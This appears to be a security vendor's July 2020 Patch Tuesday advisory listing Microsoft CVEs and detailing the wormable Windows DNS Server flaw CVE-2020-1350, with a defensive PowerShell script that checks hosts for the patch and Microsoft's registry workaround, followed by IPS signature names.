CVE-2020-1429 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1430 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1431 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1432 Skype for Business via Internet Explorer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1433 Microsoft Edge PDF Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1434 Windows Sync Host Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1435 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1436 Windows Font Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1437 Windows Network Location Awareness Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1438 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1439 PerformancePoint Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1442 Office Web Apps XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1443 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1444 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1445 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1446 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1447 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1448 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1449 Microsoft Project Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1450 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1451 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1454 Microsoft SharePoint Reflective XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1456 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1458 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1461 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1462 Skype for Business via Microsoft Edge (EdgeHTML-based) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1463 Windows SharedStream Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1465 Microsoft OneDrive Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1468 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1469 Bond Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1481 Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.

Windows DNS Server Remote Code Execution Vulnerability CVE-2020-1350

A remote code execution vulnerability exists in Windows Domain Name System servers when certain requests are not properly handled. This issue results from a flaw in Microsoft’s DNS server role implementation. An attacker who successfully exploits the vulnerability could run arbitrary code in the context of the Local System Account. Windows servers that are configured as DNS servers are at risk as a result of this vulnerability.

To exploit the vulnerability, an unauthenticated attacker could send malicious requests to a Windows DNS server.

This vulnerability (CVE-2020-1350) is classified as a ‘wormable’ vulnerability and has a CVSS base score of 10. Wormable vulnerabilities have the potential to spread via malware between vulnerable computers without user interaction.

This issue affects the following Windows Server versions. Non-Microsoft DNS Servers are not affected.

  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019
  • Microsoft Windows Server version 1803 (Server Core installation)
  • Microsoft Windows Server version 1903 (Server Core installation)
  • Microsoft Windows Server version 1909 (Server Core installation)
  • Microsoft Windows Server version 2004 (Server Core installation)

Microsoft has patched this vulnerability in its July Patch Tuesday updates. Users are encouraged to patch their systems as soon as possible.
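Because only hosts running the Windows DNS Server role are in scope, an administrator's first job is to find those hosts and confirm that each one carries the July update. The following PowerShell inventory check is an added example written for this page; it is not SonicWall's or Microsoft's code. It assumes it runs on a Windows Server host with the ServerManager module available, takes the required update ID as a parameter (the `KBxxxxxxx` value is a placeholder, since the July 2020 cumulative update number differs per Windows Server release and must be looked up in Microsoft's advisory for CVE-2020-1350), and additionally reports whether Microsoft's published interim registry workaround for this CVE (`TcpReceivePacketSize` under the DNS service parameters key, documented in Microsoft KB4569509 and not mentioned on this page) is in place.

```powershell
# Added example, not code from the SonicWall page.
# Exposure check for CVE-2020-1350 on a single Windows Server host.
param(
    # Placeholder: replace with the July 2020 cumulative update ID for this OS build.
    [string]$RequiredKb = 'KBxxxxxxx'
)

$report = [ordered]@{
    ComputerName = $env:COMPUTERNAME
    OsVersion    = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
    DnsRole      = $false   # Windows DNS Server role installed?
    Patched      = $false   # required cumulative update present?
    Workaround   = $false   # Microsoft's interim registry workaround applied?
}

# 1. Only hosts with the DNS Server role are affected; non-Microsoft DNS is out of scope.
$feature = Get-WindowsFeature -Name DNS -ErrorAction SilentlyContinue
$report.DnsRole = [bool]($feature -and $feature.Installed)

# 2. Check for the July 2020 update (ID supplied by the caller, see placeholder above).
$report.Patched = [bool](Get-HotFix -Id $RequiredKb -ErrorAction SilentlyContinue)

# 3. Check Microsoft's published interim workaround (KB4569509): a DWORD named
#    TcpReceivePacketSize set to 0xFF00 under the DNS service parameters key.
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$item = Get-ItemProperty -Path $regPath -Name TcpReceivePacketSize -ErrorAction SilentlyContinue
$report.Workaround = ($null -ne $item -and $item.TcpReceivePacketSize -eq 0xFF00)

# Emit one object per host so the results can be collected across a fleet
# (for example via Invoke-Command) and exported to CSV for tracking.
[pscustomobject]$report

if ($report.DnsRole -and -not $report.Patched -and -not $report.Workaround) {
    Write-Warning "$($report.ComputerName): DNS Server role present with neither the update nor the workaround; exposed to CVE-2020-1350."
}
```

The workaround flag is reported only as a stopgap indicator: Microsoft's guidance treats the registry setting as temporary, and the host should still be counted as outstanding until the cumulative update is installed.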

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15069: Windows DNS Server Remote Code Execution (CVE-2020-1350) 1
  • IPS 15073: Windows DNS Server Remote Code Execution (CVE-2020-1350) 2
  • IPS 15074: Windows DNS Server Remote Code Execution (CVE-2020-1350) 3
  • IPS 15075: Windows DNS Server Remote Code Execution (CVE-2020-1350) 4
  • IPS 15076: Windows DNS Server Remote Code Execution (CVE-2020-1350) 5